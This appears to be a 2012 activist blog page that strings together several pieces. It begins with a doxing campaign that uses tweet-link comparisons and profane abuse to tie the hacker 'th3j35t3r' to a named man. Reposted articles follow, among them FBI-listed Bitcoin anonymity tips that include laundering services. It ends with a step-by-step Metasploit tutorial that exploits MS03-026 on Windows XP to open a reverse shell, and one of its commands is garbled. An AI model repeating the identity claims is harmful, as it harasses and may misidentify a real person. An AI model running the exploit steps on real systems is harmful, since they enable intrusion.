https://twitter.com/#!/TomRyanBlog/status/180380942614016001

https://twitter.com/#!/TomRyanBlog/status/187903623693467648

https://twitter.com/#!/TomRyanBlog/status/187361681452699649

https://twitter.com/#!/TomRyanBlog/status/187541167972417536

https://twitter.com/#!/TomRyanBlog/status/187322975383588864

https://twitter.com/#!/TomRyanBlog/status/187309018623127552

https://twitter.com/#!/TomRyanBlog/status/187558445036216320

https://twitter.com/#!/TomRyanBlog/status/187541167972417536

https://twitter.com/#!/TomRyanBlog/status/187656738818899968

https://twitter.com/#!/TomRyanBlog/status/187261297669308416

https://twitter.com/#!/TomRyanBlog/status/187530160134828032

https://twitter.com/#!/TomRyanBlog/status/184620737821286402

Jester ‘LMAO!’:

https://twitter.com/#!/th3j35t3r/status/105305979733815296

TR ‘ROFLMAO!’:

https://twitter.com/#!/TomRyanBlog/status/180709354624925696

https://twitter.com/#!/TomRyanBlog/status/179773457943371776

https://twitter.com/#!/TomRyanBlog/status/187709243087003650

https://twitter.com/#!/TomRyanBlog/status/186965988082843648

https://twitter.com/#!/TomRyanBlog/status/187272732147322880

https://twitter.com/#!/TomRyanBlog/status/187583747154132992

J struggles with apostrophes:

https://twitter.com/#!/th3j35t3r/status/83239272504770560

https://twitter.com/#!/th3j35t3r/status/177080046597578752

https://twitter.com/#!/th3j35t3r/status/186749312166932483

(See his blog for heaps more examples.)

http://www.youtube.com/watch?v=WeO44IWlkfU (Skip to 5:07); ‘lets’, ‘its’ and ‘Thats’ should all have apostrophes.

http://www.youtube.com/watch?v=yJTvzErKHWE Look at the Notepad he’s typing into: ‘lets’ should have an apostrophe and ‘peak’ should have two ‘e’s in it. Skip to 2:20: the text on Jester’s self-designed Xerxes machine also contains typos: ‘SUCCESFULLY’ should have two ‘s’ in the middle. At 2:29, you’ll see that ‘Secured’ has also been spelt wrongly. At 6:52 he also types the same misspelt word into Notepad.

TR also struggles with apostrophes:

https://twitter.com/#!/TomRyanBlog/status/187920367845781504

https://twitter.com/#!/TomRyanBlog/status/187710784690855936

https://twitter.com/#!/TomRyanBlog/status/180432605680902144

https://twitter.com/#!/TomRyanBlog/status/187645320442822656

https://twitter.com/#!/TomRyanBlog/status/187531807598714880

https://twitter.com/#!/TomRyanBlog/status/187917710498336769

https://twitter.com/#!/TomRyanBlog/status/185737304290234368

https://twitter.com/#!/TomRyanBlog/status/178485680899502081

J tweets ‘TANGO DOWN’:

https://twitter.com/#!/th3j35t3r/status/175040242477318144

https://twitter.com/#!/th3j35t3r/status/175029005718794240

TR tweets ‘TANGO DOWN’:

https://twitter.com/#!/TomRyanBlog/status/186482996352778240

https://twitter.com/#!/TomRyanBlog/status/186482690797744128

J always writes numbers numerically:

https://twitter.com/#!/th3j35t3r/status/174540542724669441

https://twitter.com/#!/th3j35t3r/status/93771304607563776

https://twitter.com/#!/th3j35t3r/status/114830590452310016

https://twitter.com/#!/th3j35t3r/status/134434056925483008

https://twitter.com/#!/th3j35t3r/status/140925221090758656

https://twitter.com/#!/TomRyanBlog/status/185576329712910336

TRB always writes numbers numerically:

https://twitter.com/#!/TomRyanBlog/status/187211721365139456

https://twitter.com/#!/TomRyanBlog/status/187712594373648384

https://twitter.com/#!/TomRyanBlog/status/178965908696481793

https://twitter.com/#!/TomRyanBlog/status/187680293984022529

https://twitter.com/#!/TomRyanBlog/status/187539614876176384

Compare TR and J’s tweet patterns, in particular the time of day they tweet at and the hashtags they use: http://tweetstats.com (Open two separate windows and enter their Twitter names).

J using #Fail:

https://twitter.com/#!/th3j35t3r/status/132152349639720960

https://twitter.com/#!/th3j35t3r/status/103200916156588032

https://twitter.com/#!/th3j35t3r/status/102784136015646722

https://twitter.com/#!/th3j35t3r/status/97030633330716674

https://twitter.com/#!/th3j35t3r/status/178966110694150144

J using #Fail:

https://twitter.com/#!/TomRyanBlog/status/187708057344671744

https://twitter.com/#!/TomRyanBlog/status/167697098047889411

https://twitter.com/#!/TomRyanBlog/status/177978089203175424

https://twitter.com/#!/TomRyanBlog/status/178269119316107264

https://twitter.com/#!/TomRyanBlog/status/186927307544477697

https://twitter.com/#!/TomRyanBlog/status/178573080438898689

https://twitter.com/#!/TomRyanBlog/status/178982123959619585

https://twitter.com/#!/TomRyanBlog/status/185189598677319680

https://twitter.com/#!/TomRyanBlog/status/186930868273676288

https://twitter.com/#!/TomRyanBlog/status/186965988082843648

J using #Justsayin:

https://twitter.com/#!/th3j35t3r/status/76373640832225282

TRB using #Justsayin:
https://twitter.com/#!/TomRyanBlog/status/177907983227949056

https://twitter.com/#!/TomRyanBlog/status/179578215411630080

https://twitter.com/#!/TomRyanBlog/status/178518183525888000

https://twitter.com/#!/TomRyanBlog/status/184620737821286402

https://twitter.com/#!/TomRyanBlog/status/184270112361168898

_________________________________________________________________________

PIRAX DOXING CONTINUED… (The ‘smedley manning’ debacle)
You took this DOX’ing really well, to be honest. You shook it off as a mere fancification numerous times, and continued forward head-strong, apparently unmoved by those watching from the outside. But you knew deep-down that you had to eradicate this DOX from the minds of the enemies you have procured over the years. You know that a lot of people would like to see you gone. So, you came up with a plan.

The plan went something like this:
On May 10th, you registered the Twitter account @cubespherical and labeled it as “Smedley Manning”, as an obvious satirical homage to the now imprisoned Bradley Manning, a REAL soldier who fought for truth. You then exchanged a few messages with @th3j35t3r to make it look like a legitimate conversation, and began to “leak” information about yourself. We both know that this information is false, and was only created to distract others from the real DOX, located above. We know you are somewhat intelligent. However, there will always be those who will outsmart you. Consider yourself outsmarted.

Here is the analysis, broken down:
After you took down both your Twitter and WordPress blog, the mainstream blogosphere was certain you had finally been figured out. They assumed this was your acknowledgement of your own defeat and were positive you had been successfully DOX’d by @cubespherical. You were finally giving up. You knew they would react this way… It was all a part of your master plan. But, in reality, you ARE @cubespherical. Yes, @th3j35t3r and @cubespherical are the same person. Nicely done, Tom. You fooled almost everyone. But, like all good things (“good” meaning something along the lines of “idiotic” in this case), you must come to an end.

So how can we justify this claim? Where is our proof? Simple: You gave us everything.

Red-Flag #1: You have been a pretty regular user of Twitter until very recently, after the above DOX was published.

Red-Flag #2: An entirely new DOX is now being teased, even while the above DOX is as sure-fire as they come. Who would believe that a DOX coming from @cubespherical, an entirely new one at that, would be legitimate?

Red-Flag #3: You sat idle on Twitter while @cubespherical AKA Smedley Manning openly talked shit about you, only responding once things became heated on InfoSecIsland. This will take some psychological investigation, but it is damning nonetheless. Your article here is the most revealing bit of all:

http://www.infosecisland.com/blogview/21348-Not-Totally-Sure-What-Just-Happened.html

You started off with the following line, paraphrased: “I thought Smedley was my friend at first [you used the word ‘supporter’] hurr durr, but he then started threatening me hurr durr.” That doesn’t even sound realistic. But it *is* a subtle way to garner sympathy. I applaud you for you effort.

Red-Flag #4: Next up is your subtle jab at Anonymous. You changed @cubespherical’s avatar to a picture of a Guy Fawkes mask and deleted the Bitcoin address in exchange for the “We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us.” motto.

In your article, you say “Even if this was a common troll, he just demonstrated that any fool can speak for and ‘as’ Anonymous.”

It is clear that you did this for one reason: to throw spears at Anonymous while appearing to be a victim of cyber-bullying on a much grander scale.

Red-Flag #5: You are subconsciously promoting @cubespherical’s efforts for Bitcoin donations.
While appearing to mock @cubespherical, while still somehow conveying him as a threat, you still manage to forget to *NOT* post his Bitcoin address. Our thoughts: You WANT @cubespherical to make some money off of some Bitcoin donations. You yourself use Bitcoin pretty regularly and accept it for donations on your blog. How do we know you aren’t just promoting @cubspherical’s Bitcoin address so that YOU can profit? Here are your words, directly lifted form your blog post:

“So here’s the throwdown. ‘Smeddles’ drop my dox. Do it. You have proved and shown nothing. Only that you are completely failing. You have no bitcoins donated, you have shown 2 things to me, Anonymous have too many chiefs and not enough indians, and that your numbers, at least 9000 allegedly, combined have 0.00000001 bitcoins between them. Here is what you have so far. lol.

https://blockexplorer.com/address/15JDgkwFVXvuxCt66eUQ434ty3jrvwPfGe

Either that or they were clever enough to realize you were full of it from the get go. As I have demonstrated and stated many times before, I will never ask the public for any money.”

WHY WOULD YOU EVEN NEED TO REMIND PEOPLE THAT YOU DON’T ASK FOR DONATIONS IF THIS ISN’T EVEN YOUR BITCOIN ADDRESS? Simple. Because it actually is.

It is also worth noting that both Smedley Manning and th3j35t3r favor Ubuntu 11.xx releases. They like using GNOME, too:
http://3.bp.blogspot.com/-9LpW_-t2lkU/TpmnnnPHn6I/AAAAAAAABMA/AKBOIZUm4sM/s1600/Opera-Next-Ubuntu-Oneric.png
http://4.bp.blogspot.com/_FJH0hYZmVtc/TF59PLnLUJI/AAAAAAAAJNE/IoVU8sTFyUo/s1600/Opera+Mobile+for+Linux+(1440×797)_023.png

To conclude this talk, Tom, we would like to take this privilege to give to you a formal FUCK YOU. You have been DOX’d and your master plan to avoid the inevitable by creating a new nemesis and a new DOX while asking fools to send you money for this bogus DOX has been foiled. You are over. No one cares about the small sites you take down with your shitty XerXes tool and everyone knows you didn’t actually DDoS WikiLeaks, or even have the ability to do so. You are a fame-whoring idiot that has finally been pulled so low, you serve no purpose for ever standing up again. Goodbye.

XOXO,
PiraX <3

@TheRealPiraX
http://pirax.de
Donate Bitcoin: 17gMaYgUsx7dj532s3ezXmfMrVhJ1BfRC1
We would also like to give a shout-out to our home on VoxAnon IRC. Much love to #voxanon _________________________________________________________________________

BUT THATS NOT IT – DON’T FORGET THIS LITTLE GEM…

Thomas Ryan: The Guy Who Snitched on Occupy Wall Street to the FBI and NYPD

The Occupy Wall Street protests have been going on for a month. And it seems the FBI and NYPD have had help tracking protesters’ moves thanks to a conservative computer security expert who gained access to one of the group’s internal mailing lists,and then handed over information on the group’s plans to authorities and corporations targeted by protesters.

Since the Occupy Wall Street protest began on September 17, New York security consultant Thomas Ryan has been waging a campaign to infiltrate and discredit the movement. Ryan says he’s done contract work for the U.S. Army and he brags on his blog that he leads “a team called Black Cell, a team of the most-highly trained and capable physical, threat and cyber security professionals in the world.” But over the past few weeks, he and his computer security buddies have been spending time covertly attending Occupy Wall Street meetings, monitoring organizers’ social media accounts, and hanging out with protesters in Lower Manhattan.

As part of their intelligence-gathering operation, the group gained access to a listserv used by Occupy Wall Street organizers called September17discuss. On September17discuss, organizers hash out tactics and plan events, conduct post-mortems of media appearances, and trade the latest protest gossip. On Friday, Ryan leaked thousands of September17discuss emails to conservative blogger Andrew Breitbart, who is now using them to try to smear Occupy Wall Street as an anarchist conspiracy to disrupt global markets.

What may much more alarming to Occupy Wall Street organizers is that while Ryan was monitoring September17discuss, he was forwarding interesting email threads to contacts at the NYPD and FBI, including special agent Jordan T. Loyd, a member of the FBI’s New York-based cyber security team.

Oh, and what do real PATRIOT VETERANS think … ?

VETERAN: We didn’t “serve our country”; We serve the interests of Capital

“I’ve seen a ton on the facebooks about “thanking veterans for their service.” As a veteran let me just be very straightforward and honest with you. We didn’t “serve our country”; we don’t actually serve our brothers/sisters or our neighbors. We serve the interests of Capital. We never risked our lives or spent months on deployment away from our family and friends so they can have this abstract concept called “freedom”. We served big oil; big coal; Coca-Cola; Kellogg, Brown, and Root and all the other big Capital interests who don’t know a fucking thing about sacrifice. These people will never have to deal with the loss of a loved one or the physical and/or psychological scars that those who “serve”, and their families, have to deal with for the rest of their lives. The most patriotic thing someone can do is to tell truth to power and dedicate yourself to building power to overthrow these sociopathic assholes. I served with some of the most real and genuine people I’ve ever met. You’ll never see solidarity like the kind of solidarity you experience when your life depends on the person next to you. But most of us didn’t join for that; we joined because we were fucking poor and didn’t have many other options.” -Anonymous

IN CONCLUSION: An obvious desperate grab to stay relevant – Does anyone care?

ANSWER: jester who? Now back projects that create positive change in the world, instead of discussing individuals who support & enable the Military Industrial Complex of death, destruction, and global enslavement of Humanity.

OH AND FOR THOSE WHO FORGOT, A REMINDER:

An (inadvertent) FBI Guide to Keeping Your #Bitcoin Transactions Below the Radar

May 31, 2012 | Anonymous

>>> FBI BITCOIN REPORT – APRIL 2012 <<<<

The FBI sees the anonymous Bitcoin payment network as an alarming haven for money laundering and other criminal activity — including as a tool for hackers to rip off fellow Bitcoin users.

That’s according to a new FBI internal report that leaked to the internet this week, which expresses concern about the difficulty of tracking the identify of anonymous Bitcoin users, while also unintentionally providing tips for Bitcoin users to remain more anonymous.

The report titled “Bitcoin Virtual Currency: Unique Features Present Distinct Challenges for Deterring Illicit Activity,” (.pdf) was published April 24 and is marked For Official Use Only (not actually classified), but was leaked to the internet on Wednesday.

In the document, the FBI notes that because Bitcoin combines cryptography and a peer-to-peer architecture to avoid a central authority, contrary to how digital currencies such as eGold and WebMoney operated, law enforcement agencies have more difficulty identifying suspicious users and obtaining transaction records.

Though the Bureau expresses confidence that authorities can still snag some suspects who use third-party Bitcoin services that require customers to submit valid identification or banking information in order to convert their bitcoins into real-world currencies, it notes that using offshore services that don’t require valid IDs can thwart tracking by law enforcement.

Bitcoin is an online currency that allows buyers and sellers to exchange money anonymously. To “cash out,” the recipient has to convert the digital cash into U.S. dollars, British pounds or another established currency. Bitcoin is used as a legitimate form of payment by numerous online retailers selling traditional consumer goods, such as clothing and music. But it’s also used by underground sites, such as Silk Road, for the sale of illegal narcotics.

To generate bitcoins, users have to download and install a free Bitcoin software client to their computers. The software generates Bitcoin addresses or accounts — a unique 36-character string of numbers and letters — to receive Bitcoin payments. The currency is stored on the user’s computer in a virtual “wallet.” Users can create as many addresses or accounts that they want.

To send bitcoins, the sender enters the recipient’s address as well as the number of bitcoins she wants to transfer to the address. The sender’s computer digitally signs the transaction and sends the information to the peer-to-peer Bitcoin network, which validates the transaction in a matter of minutes and releases the coins for the receiver to spend or convert.

The conversion value fluctuates with supply and demand and the trust in the currency. As of last month, there were more than 8.8 million bitcoins in circulation, according to Bitcoin, with a value of about $4 and $5 per bitcoin. The FBI estimates in its report that the Bitcoin economy was worth between $35 million and $44 million.

It’s easy to see the attraction for criminals.

“If Bitcoin stabilizes and grows in popularity, it will become an increasingly useful tool for various illegal activities beyond the cyber realm,” the FBI writes in the report. “For instance, child pornography and Internet gambling are illegal activities already taking place on the Internet which require simple payment transfers. Bitcoin might logically attract money launderers, human traffickers, terrorists, and other criminals who avoid traditional financial systems by using the Internet to conduct global monetary transfers.”

Bitcoin transactions are published online, but the only information that identifies a Bitcoin user is a Bitcoin address, making the transaction anonymous. Or at least somewhat anonymous. As the FBI points out in its report, the anonymity depends on the actions of the user.

Since the IP address of the user is published online with bitcoin transactions, a user who doesn’t use a proxy to anonymize his or her IP address is at risk of being identified by authorities who are able to trace the address to a physical location or specific user.

And a report published by researchers in Ireland last year showed how, by analyzing publicly available Bitcoin information, such as transaction records and user postings of public-private keys, and combining that with less public information that might be available to law enforcement agencies, such as bank account information or shipping addresses, the real identity of users might be ascertained.

But the FBI helpfully lists several ways that Bitcoin users can protect their anonymity.

Create and use a new Bitcoin address for each incoming payment.
Route all Bitcoin traffic through an anonymizer.
Combine the balance of old Bitcoin addresses into a new address to make new payments.
Use a specialized money-laundering service.
Use a third-party eWallet service to consolidate addresses. Some third-party services offer the option of creating an eWallet that allows users to consolidate many bitcoin address and store and easily access their bitcoins from any device.
Individuals can create Bitcoin clients to seamlessly increase anonymity (such as allowing users to choose which Bitcoin addresses to make payments from), making it easier for non-technically savvy users to anonymize their Bitcoin transactions.

But the bigger risk for crooks and others who use bitcoin might not come from law enforcement identifying them, but from hackers who are out to rob their virtual Bitcoin wallets dry.

There have been several cases of hackers using malware to steal the currency in the virtual wallet stored on a user’s machine.

Last year, computer security researchers discovered malware called “Infostealer.Coinbit” that was designed specifically to steal bitcoins from virtual Bitcoin wallets and transfer them to a server in Poland.

One Bitcoin user complained in a Bitcoin forum that 25,000 bitcoins had been stolen from an unencrypted Bitcoin wallet on his computer. Since the exchange rate for bitcoins at the time was about $20 per bitcoin, the value of his loss at the time was about $500,000. A popular web hosting company called Linode was also infiltrated by an attacker looking to pilfer bitcoins.

And there have also been cases of hackers attempting to use “botnets” to generate bitcoins on compromised machines.

According to the FBI, quoting an anonymous “reliable source,” last May someone compromised a cluster of machines at an unidentified Midwestern university in an attempt to manufacture bitcoins. The report doesn’t provide any additional details about the incident.

By Kim Zetter
Email Author
May 9, 2012 |
10:51 pm

http://www.wired.com/threatlevel/2012/05/fbi-fears-bitcoin/

Is Anonymous The Internet’s Most Powerful Mirage?

May 28, 2012 | Anonymous, Leaks

You may have noticed it last week. Anonymous claimed the scalp of yet another a major government agency.

Supporters of the the online movement of activists and internet trolls said they’d stolen 1.7 GB of data from an agency within the Department of Justice that aggregates crime data. They claimed to have nabbed “lots of shiny things such as internal emails and the entire database dump.” They branded the heist as “Monday Mail Mayhem,” said it could help people “know the corruption in their government.” They posted it on Pirate Bay as a torrent, for anyone to see — and 1.7 GB was just the size of the zipped file.

Not many people bothered to check what was actually in the huge file.

Step in Identity Finder, a software security firm. Privacy officer Aaron Titus downloaded the payload last week and sifted through it all, checking out the veracity of the claims by Anonymous.

Turned out they were overhyped.

The zipped file contained 6.5 GB of web server files and “does not appear to contain any sensitive personal information, internal documents, or internal emails,” according to Titus. A folder named “Mail” was mostly empty, though it contained two administrative email addresses. There were also no personal details (social security numbers or credit card numbers), and the worst the breach had done was reveal the site’s web server file, which could be leveraged by other hackers for future attacks.

It looked like the breach had done more to grab attention from the media and the Department of Justice than do any real damage.

Surprised? You shouldn’t be. This was another illustration of the power of Anonymous as a continuing online insurgency: not in hacking per se, but its constant ability to grab eyeballs, project power, and give followers a voice and sense of purpose unlike any they’ve experienced before. What’s important for companies and policy makers (the typical targets) to note is that it’s oftentimes more a tease than anything else.

Other examples:

1) Earlier this month Fox News reported that an online group called TheWikiBoat, aligned with Anonymous, planned to bring down the websites of 46 major companies on Friday May 25. TheWikiBoat said in a public statement that it had “no motives other then [sic] doing it for the lulz,” (ie. for shits and giggles). The FBI’s Cyber Division was concerned enough to send an email to the likes of Apple Computer, McDonald’s and ExxonMobile warning them of a potential attack — which didn’t happen.

2) Around this time last year, a single supporter of Anonymous managed to grab global headlines when he tweeted that he had a cache of bank of America emails. What he eventually released was an e-mail exchange between himself and a BofA ex-staffer who made (what admittedly looked like valid) complaints about the bank’s management. But it did nothing to the bank’s stock price, and the news agenda quickly moved on.

3) In December 2010 Anonymous claimed responsibility for taking down the websites of PayPal, MasterCard and Visa after these firms nixed online donations to WikiLeaks. How? Supporters implied it was thanks to thousands of volunteers who had become part of an cyber army by downloading a software tool called LOIC. What really happened: a couple of supporters with botnets temporarily took the sites down — but the notion that Anonymous was an international “army” of hacktivists was left floating around the Internet.

Time and again, online supporters have laid claim to the brand power of Anonymous, invoking its name, imagery such as the Guy Fawkes logo and headless, suited man surrounded by olive leaves, along with the tag line, “We are Anonymous… Expect us.” The result: news outlets and policy makers sit up and listen, more so than they would if those supporters used their real names, or were literally anonymous. The power of Anonymous is propagated by the continued use of a name wrapped in hype and disinformation, more than the occasional real hacks.

The Anonymous “brand” gets street cred from cyber attacks carried out by a minority of hackers who know how to use SQL injection techniques or who know people who control botnets. The additional hype comes from the impassioned, sometimes-threatening rhetoric of less-skilled-but-enthusiastic followers on Twitter or the imageboard 4chan.

Why do these supporters join in? Everyone has their own reasons — something to do, the engaging community of people to talk to, the thrill of being part of a secret crowd. Sources in Anonymous that I have spoken to over the last year often speak to a sense of purpose they get from Anonymous, and sometimes the justification to do the subversive, often-illegal things online that they would not otherwise do. It’s mob mentality with a twist — the activist element of protest, twinned with the culture of trolling and exaggeration that runs through image boards like 4chan.

For law enforcement, who happen to chase anarchists with particular zeal in the United States, there isn’t so much a criminal organization to rope in as the mirage of one. No system with leaders and rules, but a culture and etiquette that is changing all the time. Many of the figureheads who organized the Anonymous attacks against Scientology in 2008 have left the community to focus on college or full-time jobs, many happy to break away from the frenetic pace of operations and the constant paranoia about getting doxxed. Those who’ve been arrested are upheld as martyrs within the network, and there are many more who are joining, and who think they can do a better job of hiding from the police.

Anonymous will continue to exist for some time, taking new followers, changing tactics, and often staying one spontaneously-placed step ahead of the police. They’ll fight for the right to their anonymity, to expose other people’s information, or anything they want, and they’ll come and go from the headlines. But these chaotic actors will stick around, and their greatest power will continue to be not their skills or abilities, but the very name that they can invoke.

For more details on how Anonymous works and the real, human stories behind it, check out my forthcoming book, “We Are Anonymous: Inside the Hacker World Of LulzSec, Anonymous and the Global Cyber Insurgency.”

Or follow me on Twitter: @parmy

SOURCE: http://www.forbes.com/sites/parmyolson/2012/05/30/is-anonymous-the-internets-most-powerful-mirage/

Hack Like a Pro: How to Exploit and Gain Remote Access to PCs Running Windows XP

May 23, 2012 | Anonymous

In my first installment in this series on professional hacking tools, we downloaded and installed Metasploit, the exploitation framework. Now, we will begin to explore the Metasploit Framework and initiate a tried and true hack.

Before we start hacking, let’s familiarize ourselves with Metasploit so that when I use certain terms, we all understand them to mean the same thing. When first looking at the Metasploit Framework, it can be a bit overwhelming with the various interfaces, options, utilities, and modules. Here we’ll try to make it understandable so that we can execute our first exploit.

Terminology

The following terminology is not only used within the Metasploit Framework, but throughout the professional hacking and penetration testing communities. As a result, any professional in this field should be familiar with these terms and be able to clearly distinguish them.

Exploit

Exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access). Some more common exploits that you’ve probably already heard of are SQL injections, buffer overflows, etc.

Payload

A payload is the program or code that is delivered to the victim system. Metasploit has pre-built payloads for this purpose included in the highly useful Meterpreter, or you can develop your own. This payload is designed to provide the attacker with some capability to manage or manipulate the target system for their particular needs.

Shellcode

This is a set of instructions used as a payload when the exploitation occurs. Shellcode is typically written in assembly language, but not necessarily always. It’s called “shellcode” because a command shell or other command console is provided to the attacker that can be used to execute commands on the victim’s machine.

Module

A module is a piece of software that can be used by the Metasploit Framework. These modules are interchangeable and give Metasploit its unique power. These modules might be exploit modules or auxiliary modules.

Listener

This is that component that listens for the connection from the hacker’s system to the target system. The listener simply handles the connection between these systems.

Show

Metasploit Framework has hundreds of modules and other utilities. As a result, you will not be able to remember them all. Fortunately, the show command can grab a listing of all modules, options, targets, etc. in your framework.

Now that we have the basics of Metasploit concepts and commands down, let’s hack a system!

Step 1 Getting Started

First, open a terminal in Linux.

One of the most reliable hacks is on the ubiquitous Windows XP system with the RPC DCOM. It’s a buffer overflow attack that enables the attacker to execute any code of their choice on the owned box (note Microsoft’s comment under impact of vulnerability). Microsoft identifies it as MS03-026 in their database of vulnerabilities. In our case, we will use it to open a reverse shell on our target system.

Open the the Metasploit console.

msfconsole

Be patient, it takes awhile for Metasploit to load all of its modules. The current version of Metasploit has 823 exploits and 250 payloads.

Step 2 Find the Exploit

Metasploit allows you to search using the search command. In our case, we are searching for a DCOM exploit, so we can simply type:

msf > search dcom

Step 3 Set the Exploit

Now let’s tell Metasploit what exploit we want to use. Type use and the name of our exploit, exploit/windows/dcerpc/ms03_026_dcom.

msf > use exploit/windows/dcerpc/ms03_026_dcom

Note that the prompt has changed and now reflects our chosen exploit.

Step 4 Set the Options

Now that we’ve chosen our exploit, we can ask Metasploit what our options are. By typing show options, Metasploit will list our options in executing this exploit.

msf > show options

Step 5 Set Remote Host

Metasploit will now ask us for the RHOST. This will be the IP address of the remote host or the machine we’re attacking. In our case, it’s 10.0.0.3. Use the actual IP address of the machine you are attacking. Tools such as nmap can help in identifying the IP address of the machine you are attacking. Notice in the picture above that Metasploit tells us that we will be using (binding) port 135.

msf > set RHOST 10.0.0.3

Step 6 Show Payloads

Next, we check to see what payloads are available for this exploit. Type show payloads at the Metasploit prompt:

msf > show payloads

Step 7 Set Payload

Now that we can see what payloads are available, we can select the generic/shell_reverse_tcp by using the Metasploit console set command. If successful, this will establish a remote shell on the target system that we can command.

msf > set PAYLOAD generic/shell_reverse_tcp

Step 8 Set Local Host

Now that we’ve chosen the exploit and the payload, we need to tell Metasploit the IP address of our attacking machine. In this example, our target system has an IP address of 10.0.0.6. Use the actual IP address of the system you are attacking. Tools such a nmap, can help you obtain IP addresses.

msf > set LHOST 10.0.0.6

Step 9 Exploit

Now we command Metasploit to exploit the system:

msf > exploit

Step 10 Open a Shell on the Hacked System

Type the command –I 1 to open a command shell on the XP system that will appear on your Metasploit console.

–I 1

To confirm that the command shell is on the Windows XP system, type dir to get a directory listing on the Windows XP system that you now own!

C: >dir

Congratulations! You have just hacked your first system using Metasploit!

In my upcoming lessons, we will look at hacking Linux systems and introduce you to the powerful Meterpreter, Metasploit’s proprietary payload.

Source: http://www.businessinsider.com/hack-like-a-pro-how-to-exploit-and-gain-remote-access-to-pcs-running-windows-xp-2012-4

« Older Entries

Next Entries »